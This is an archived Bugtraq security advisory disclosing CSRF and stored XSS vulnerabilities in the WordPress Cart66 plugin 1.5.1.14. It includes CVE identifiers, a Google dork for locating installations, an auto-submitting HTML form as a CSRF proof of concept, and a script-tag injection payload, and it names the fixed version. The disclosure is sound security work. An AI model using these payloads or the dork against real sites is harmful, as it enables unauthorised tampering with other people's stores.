| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <201310120342.r9C3gbW8030781@sf01web2.securityfocus.com> Date: Sat, 12 Oct 2013 03:42:37 GMT From: jsibley1@...il.com To: bugtraq@...urityfocus.com Subject: Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities # Exploit Title: Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities # Exploit Author: absane # Blog: http://blog.noobroot.com # Discovery date: September 29th 2013 # Vendor notified: September 29th 2013 # Vendor fixed: October 12 2013 # Vendor Homepage: http://cart66.com # Software Link: http://downloads.wordpress.org/plugin/cart66-lite.1.5.1.14.zip # Tested on: Wordpress 3.6.1 # Google-dork: inurl:/wp-content/plugins/cart66 # CVE (CSRF): CVE-2013-5977 # CVE (XSS): CVE-2013-5978 Two vulnerabilities were discovered in the Wordpress plugin Cart66 version 1.5.1.14. Vulnerabilities: 1) CSRF 2) Code Injection VULNERABILITY #1 ************ *** CSRF *** ************ Page affected: http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products ================ Proof of Concept ================ <html><body> <form name="csrf_form" action="http://192.168.196.135/wordpress/wp-admin/admin.php?page=cart66-products" method="post" enctype="multipart/form-data" id="products-form"> <input type="hidden" name="cart66-action" value="save product" /> <input type="hidden" name="product[id]" value="" /> <input class="long" type="hidden" name='product[name]' id='product-name' value='absane was here' /> <input type='hidden' name='product[item_number]' id='product-item_number' value='1337' /> <input type='hidden' id="product-price" name='product[price]' value='13.37' /> <input type='hidden' id="product-price_description" name='product[price_description]' value='LuLz' /> <input type='hidden' id="product-is_user_price" name='product[is_user_price]' value='0' /> <input type="hidden" id="product-min_price" name='product[min_price]' value='' /> <input type="hidden" id="product-max_price" name='product[max_price]' value='' /> <input type='hidden' id="product-taxable" name='product[taxable]' value='0'> <input type='hidden' id="product-shipped" name='product[shipped]' value='1'> <input type="hidden" id="product-weight" name="product[weight]" value="" /> <input type="hidden" id="product-min_qty" name='product[min_quantity]' value='' /> <input type="hidden" id="product-max_qty" name='product[max_quantity]' value='' /> <script type="text/javascript">document.csrf_form.submit();</script> </body></html> VULNERABILITY #2 *********************** *** Code Injection *** *********************** Page affected: http://[victim_site]/wordpress/wp-admin/admin.php?page=cart66-products in the following input fields: * Product name * Price description ================ Proof of Concept ================ In the vulnerable fields add <script>alert(0)</script> or any other code. The code is placed directly into the database. Input is not sanatized and the code can be executed in ways that depend on the circumstances. During testing, the theme 'iShop 1.0.0' was used and the PoC JavaScript code was executed when I attempted to add a product or modify an existing product. ]....................................[ ]..............SOLUTIONS.............[ ]....................................[ Update to version 1.5.1.15 or greater.
Powered by blists - more mailing lists